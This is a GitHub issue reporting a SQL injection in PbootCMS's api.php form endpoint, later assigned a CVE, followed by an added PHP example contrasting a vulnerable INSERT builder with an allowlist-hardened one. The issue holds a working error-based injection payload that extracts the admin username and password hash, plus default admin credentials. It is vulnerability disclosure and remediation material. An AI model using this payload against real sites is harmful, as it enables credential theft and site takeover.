Pbootcms SQL injection in api.php #1

Open
hackd0g opened this Issue Oct 8, 2018 · 2 comments

hackd0g commented Oct 8, 2018

The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
The MySQL database directory:
Pbootcms-master\static\backup\sql\20180720164810_pbootcms.sql

An authorization code is required after installation. We can go to this URL and enter our IP to get the authorization code.
URL: https://www.pbootcms.com/freeasn.html
This SQL injection requires background api functionality.

http://127.0.0.1/Pbootcms-master/admin.php
username=admin
password=123456

When the api function is enabled in the background, the foreground api will have SQL injection.

http://127.0.0.1/PbootCMS-V1.2.1/api.php/cms/addform?fcode=1
POST:contacts[content`) VALUES ( updatexml(1,concat(0x7e,(SELECT//distinct//concat(0x23,username,0x3a,password,0x23)//FROM//ay_user//limit//0,1),0x7e),1) );-- a] = 111 & mobile=13112344321 & content=123

We can get the admin account name and password
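
For anyone fixing this class of bug, an added example (not PbootCMS code and not from the reporter) of the pattern the request above points to: the `` `) VALUES ( `` prefix in the array key suggests a request-supplied key reaches the column list of an `INSERT`. The function names, the table `form_demo` and the allowlist are assumptions made for illustration.

```php
<?php
// Added illustration, not PbootCMS source. Table/column names are hypothetical.

// Vulnerable pattern: request-supplied array keys become column names.
function build_insert_unsafe(string $table, array $fields): string
{
    $cols = '`' . implode('`,`', array_keys($fields)) . '`';
    $vals = "'" . implode("','", array_map('addslashes', $fields)) . "'";
    return "INSERT INTO `$table` ($cols) VALUES ($vals)";
}

// Hardened pattern: column names must match a server-side allowlist and
// values are returned separately for binding (e.g. PDOStatement::execute).
function build_insert_safe(string $table, array $fields, array $allowed): array
{
    $cols = [];
    $params = [];
    foreach ($fields as $name => $value) {
        if (!is_string($name) || !in_array($name, $allowed, true)) {
            throw new InvalidArgumentException('unexpected form field');
        }
        if (!is_scalar($value)) {
            throw new InvalidArgumentException('field value must be scalar');
        }
        $cols[] = "`$name`";
        $params[":$name"] = (string) $value;
    }
    if ($cols === []) {
        throw new InvalidArgumentException('no fields submitted');
    }
    $sql = "INSERT INTO `$table` (" . implode(',', $cols) . ') VALUES ('
         . implode(',', array_keys($params)) . ')';
    return [$sql, $params];
}

// Constructed input: the second key carries a backtick, so it escapes the
// identifier quoting in the unsafe builder.
$allowed = ['contacts', 'mobile', 'content'];
$fields = ['mobile' => '13112344321', 'content`,`extra' => '123'];
echo build_insert_unsafe('form_demo', $fields), "\n";
try {
    build_insert_safe('form_demo', $fields, $allowed);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
[$sql, $params] = build_insert_safe('form_demo', ['mobile' => '13112344321'], $allowed);
echo $sql, "\n";
```

Escaping values alone does not help here, because the injected text sits in identifier position; only the allowlist check on the key closes it.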
hackd0g commented Oct 8, 2018

GitHub filtered **, if you have any questions, you can view the image exp

fgeek commented Oct 13, 2018

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18211 has been assigned for this vulnerability.
